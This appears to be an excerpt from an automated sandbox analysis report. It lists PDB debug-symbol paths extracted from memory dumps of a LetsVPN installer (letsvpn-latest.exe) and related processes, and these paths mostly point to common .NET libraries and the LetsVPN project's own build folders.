              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: letsvpn-latest.exe, 00000013.00000003.2503453732.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: letsvpn-latest.exe, 00000013.00000003.2395625612.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2450317572.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: letsvpn-latest.exe, 00000013.00000003.2390404477.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: letsvpn-latest.exe, 00000013.00000003.2443068501.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2449650568.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2418029121.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: letsvpn-latest.exe, 00000013.00000003.2488650943.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: letsvpn-latest.exe, 00000013.00000003.2500003691.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: letsvpn-latest.exe, 00000013.00000003.2458732263.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2487372239.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: letsvpn-latest.exe, 00000013.00000003.2447316016.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: letsvpn-latest.exe, 00000013.00000003.2423303491.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: letsvpn-latest.exe, 00000013.00000003.2353949816.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2348840467.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2776724379.0000000005842000.00000002.00000001.01000000.0000001C.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: letsvpn-latest.exe, 00000013.00000003.2499310086.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2396668946.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\playercode\branches\branch\bin\Release\sinaplayer_service.pdb source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: letsvpn-latest.exe, 00000013.00000003.2357195535.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: letsvpn-latest.exe, 00000013.00000003.2448705376.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: letsvpn-latest.exe, 00000013.00000003.2426656105.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: letsvpn-latest.exe, 00000013.00000003.2366490772.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444291104.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2416528119.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2366490772.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: letsvpn-latest.exe, 00000013.00000003.2497054604.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: letsvpn-latest.exe, 00000013.00000003.2419235971.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: letsvpn-latest.exe, 00000013.00000003.2446699200.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2483211006.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: letsvpn-latest.exe, 00000013.00000003.2391660353.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.PdbG source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: letsvpn-latest.exe, 00000013.00000003.2391033106.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2381214379.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3950223249.00000000591D2000.00000002.00000001.01000000.0000002C.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdb source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2362731884.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: letsvpn-latest.exe, 00000013.00000003.2326863486.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: letsvpn-latest.exe, 00000013.00000003.2393362455.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2444291104.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: letsvpn-latest.exe, 00000013.00000003.2381214379.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3950223249.00000000591D2000.00000002.00000001.01000000.0000002C.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: letsvpn-latest.exe, 00000013.00000003.2422786884.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: letsvpn-latest.exe, 00000013.00000003.2327691194.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: letsvpn-latest.exe, 00000013.00000003.2408110163.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
